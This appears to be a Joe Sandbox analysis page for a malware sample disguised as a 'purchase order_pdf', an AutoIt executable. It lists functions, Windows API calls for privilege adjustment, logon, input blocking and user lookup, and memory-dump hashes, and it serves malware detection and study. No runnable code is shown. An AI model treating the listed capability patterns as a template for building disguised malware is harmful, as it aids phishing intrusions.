Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: e352b2e7608cd71b6564fe4120320834b3525d1076a69e101cad5b6648fe03d9
Instruction ID: 938e1f437378843cc21a6c00c593fa7ad1bf875d9f1ec42da18648e4eb06c58f
Opcode Fuzzy Hash: e352b2e7608cd71b6564fe4120320834b3525d1076a69e101cad5b6648fe03d9
Instruction Fuzzy Hash: 62116AB1414609AFE728AF68DC85D6BB7B8FB44710B24852EF55693241EF30EC408B60

Function 008D4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008D4C43
FreeSid.ADVAPI32(?), ref: 008D4C53

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 9e26073f02999ad777aa1afea13f97b4757191a055e128c1d21bf213beb8056c
Instruction ID: 57876f07ef9246c47bf94775ef983f447d0717ed75acc3169aa00f9069ef27fc
Opcode Fuzzy Hash: 9e26073f02999ad777aa1afea13f97b4757191a055e128c1d21bf213beb8056c
Instruction Fuzzy Hash: 76F03C75911208BBDB04DFF09C89EBDB7B8FF08201F004469A601E2182E7705A048B50

Function 0087E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b68e25060b9167881c83b396eecaf81ad065108f2281f3dcb6250df7be132ba
Instruction ID: 4f757898c00fd734bfc546373b28b1d930ef4f921f2172973dec73caf8e44628
Opcode Fuzzy Hash: 5b68e25060b9167881c83b396eecaf81ad065108f2281f3dcb6250df7be132ba
Instruction Fuzzy Hash: AE22AF70A0021ADFDB24DF58C481AAEB7B0FF18314F14C1A9E85ADB359E735E985CB91

Function 008DC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008DC966
FindClose.KERNEL32(00000000), ref: 008DC996

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: aa6a79080f0f1bf4df82e0fe8d3fdb13fdad8251d008023c9e3ac7b0b0e2bd91
Instruction ID: 71209a7244d6488a099e28d17ffae3963ac7a6a515794dc8451b0e24d7321233
Opcode Fuzzy Hash: aa6a79080f0f1bf4df82e0fe8d3fdb13fdad8251d008023c9e3ac7b0b0e2bd91
Instruction Fuzzy Hash: B71130716106149FD7109F29D845E2AFBE5FF84324F00851EF9A9D7391DB30E805CB81

Function 008DA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008E977D,?,008FFB84,?), ref: 008DA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008E977D,?,008FFB84,?), ref: 008DA314

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 944af96ebfcfb308c150bc0f6b00830d377501dd01a4f65cbe41911625a09b30
Instruction ID: dd36dd9aef8233273fa85fad790a6bd82073be1187cc6eb6ad44895516ee99b8
Opcode Fuzzy Hash: 944af96ebfcfb308c150bc0f6b00830d377501dd01a4f65cbe41911625a09b30
Instruction Fuzzy Hash: BFF0823554422DABEB109FA8CC48FEA776DFF09761F108266F908D6281DB309940CBA1

Function 008C8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008C8851), ref: 008C8728
CloseHandle.KERNEL32(?,?,008C8851), ref: 008C873A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: af3295daa19bcd0added32c920156a48df94d422bd4d53d91af6a5a7cc1004d7
Instruction ID: b4e744f0fd28250594db400fe864eb2157915181cca80770fbef4b3efb3a591d
Opcode Fuzzy Hash: af3295daa19bcd0added32c920156a48df94d422bd4d53d91af6a5a7cc1004d7
Instruction Fuzzy Hash: 04E0B676014A11EEEB252B65EC09E777BA9FF04390B28892DF5A6C0471DB62AC90DB10

Function 0089A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00898F97,?,?,?,00000001), ref: 0089A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0089A3A3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 974633c1ee6ab7deeda2477b3b10a89fe9f2ffb70c31d47d4d13d98eb04a102c
Instruction ID: c157d543abaa1c7ec7e4766eec9e2f4ed274f7e63534bdf022c5dde99d261f30
Opcode Fuzzy Hash: 974633c1ee6ab7deeda2477b3b10a89fe9f2ffb70c31d47d4d13d98eb04a102c
Instruction Fuzzy Hash: 59B09231054208ABCA102BA1EC09FA83F6AFF44AA2F404020F70D84262CB625450CA95

Function 0089F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56a55e847db85d51a6dace6482df43c5b265a8ff574333e092f262b7c732cf0
Instruction ID: 1124b0027f935491f79a26e3025105860b440eeebc8b8169cdc77917672dc058
Opcode Fuzzy Hash: c56a55e847db85d51a6dace6482df43c5b265a8ff574333e092f262b7c732cf0
Instruction Fuzzy Hash: 42320522D29F054DDB27A634D832335A289EFB73D8F19D737E819F59A6EB28D4835100

Function 008A267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9784b49fa4c640c52fd48346a4ee9d4b2583ff2586992decc36171f0c32b90
Instruction ID: ba412229ffae623fe756276cd22bb5cd1c3c0a23570644e9c9c12d6cefff40cc
Opcode Fuzzy Hash: 3c9784b49fa4c640c52fd48346a4ee9d4b2583ff2586992decc36171f0c32b90
Instruction Fuzzy Hash: 07B1F021E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2670D62EB2185835181

Function 008D8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 008D8B25

Part of subcall function 0089543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008D91F8,00000000,?,?,?,?,008D93A9,00000000,?), ref: 00895443
Part of subcall function 0089543A: __aulldiv.LIBCMT ref: 00895463

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: bc8979f1db204763649946395757f88204a5610517df881972e28878dba78d55
Instruction ID: 9af2d6a913ecc07aa8c9cfdbe646c40d8252c3881d8b633cfa870bb67529a673
Opcode Fuzzy Hash: bc8979f1db204763649946395757f88204a5610517df881972e28878dba78d55
Instruction Fuzzy Hash: 7E21D572639610CBC729CF69D441A52B3E1EBA4321B288F6DE0E5CB2D0CA34B905DF94

Function 008E41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 008E4218

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 192553e7b450388370b3e9480c896644d26dda6b4241395f964cc7ecd9ce816e
Instruction ID: 02e0323c49a341cc91d7eb1524f107b265c2a25bc289d27189b23f65d8cacdcf
Opcode Fuzzy Hash: 192553e7b450388370b3e9480c896644d26dda6b4241395f964cc7ecd9ce816e
Instruction Fuzzy Hash: A9E01A312402149FC710AF6AD844E9AF7E8FFA5760F008026F94EC7352DA70E8418BA1

Function 008D4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008D4EEC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 39bf7dd57975af0a4de64437ef0406b8f05b7d5c03ddedebb7661205c04c4535
Instruction ID: d7717f32fa360d0f05f1c1691b845eb557b09fc51fc6be38b037c5ff4ea8b987
Opcode Fuzzy Hash: 39bf7dd57975af0a4de64437ef0406b8f05b7d5c03ddedebb7661205c04c4535
Instruction Fuzzy Hash: 41D05E981606083BEC684B249C5FF770308F3007A5FD0735BB102D92C2D9F16C509031

Function 008C8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008C88D1), ref: 008C8CB3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 3d84544d0912c39d65286a26c56f1c0c554e5fbab70db9731912a5b45ca4f24c
Instruction ID: c555954b4bd78c9be58d9cfab929062b114d870d7373d255471c966ad4735a5b
Opcode Fuzzy Hash: 3d84544d0912c39d65286a26c56f1c0c554e5fbab70db9731912a5b45ca4f24c
Instruction Fuzzy Hash: F7D05E3226090EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1C775D835EB60

Function 008B2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 008B2242

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b533981a6d85e67088c04ce0fa98f0d0d72725aa5cb06c06a9036d6c5c46fa5f
Instruction ID: deaa40f92259a6ff0f5a2946fbf16712761c2471060ae9cc50a49ac322d94d58
Opcode Fuzzy Hash: b533981a6d85e67088c04ce0fa98f0d0d72725aa5cb06c06a9036d6c5c46fa5f
Instruction Fuzzy Hash: CCC04CF181010DDBDB05DBA0D998DFE77BCBB04314F104055A101F2101DB749B44CE71

Function 0089A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0089A36A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: df9fde2d7ffb3b046350ae6f8d3c3d375868dc1e6f0343dc93a8c58f100c0329
Instruction ID: 47c16c44adf41819cf58cb630d1c61dee9a71fa3c25a490062617ecb99a1cefa
Opcode Fuzzy Hash: df9fde2d7ffb3b046350ae6f8d3c3d375868dc1e6f0343dc93a8c58f100c0329
Instruction Fuzzy Hash: 9BA0123000010CA78A001B51EC048547F6DEA00190B004020F50C40122873254108580

Function 00888A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41202ccb27719234565bd2aa1ead4fc00fe45d6573e7dd6e3afd6120b4ad3aa
Instruction ID: 13ea6b06ab866eabbf47361331aaa16bfa5e726ba8a455f21e466ffae96e45fe
Opcode Fuzzy Hash: f41202ccb27719234565bd2aa1ead4fc00fe45d6573e7dd6e3afd6120b4ad3aa
Instruction Fuzzy Hash: 6722033050561ACBCF38AA29C494B7DB7B2FB41314FA8846ED842DB695DB34EDC1CB61

Function 00892405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 26f3def02aa66f4d96d6b3f9900d2b324a885485c0f00b93ca3d04edc1b33447
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 43C193322090930ADF6D9639987413EBAE1FEA27B131E076DE4B3DB5D5EF20D524D620

Function 0089283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 0125df9bbed8513ec9a93a69eec879c77816fd121f895ff1e1cd57393d96ed1d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 06C195332091A309DF6D5639983443EBBE1BBA27B131E076DE4B2DB5D4EF20D524E620

Function 00891BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ad8cfe39e26b9995e23afad22481dd6c04a7283ab352e07c7fb18c80be139640
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 8EC1713620D19709DF6D563A987803EBAE1FAA27B131E076DE4B3CB5D4EF20D524D620

Function 008E7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008E7B70
DeleteObject.GDI32(00000000), ref: 008E7B82
DestroyWindow.USER32 ref: 008E7B90
GetDesktopWindow.USER32 ref: 008E7BAA
GetWindowRect.USER32(00000000), ref: 008E7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008E7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008E7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7D4A
GetClientRect.USER32(00000000,?), ref: 008E7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008E7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7DF8
GlobalFree.KERNEL32(00000000), ref: 008E7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00902CAC,00000000), ref: 008E7E2B
GlobalFree.KERNEL32(00000000), ref: 008E7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008E7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008E7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E7EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008E808F

Strings

, xrefs: 008E8015
static, xrefs: 008E7D8A, 008E7EE1
AutoIt v3, xrefs: 008E7D42
DISPLAY, xrefs: 008E7EF2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
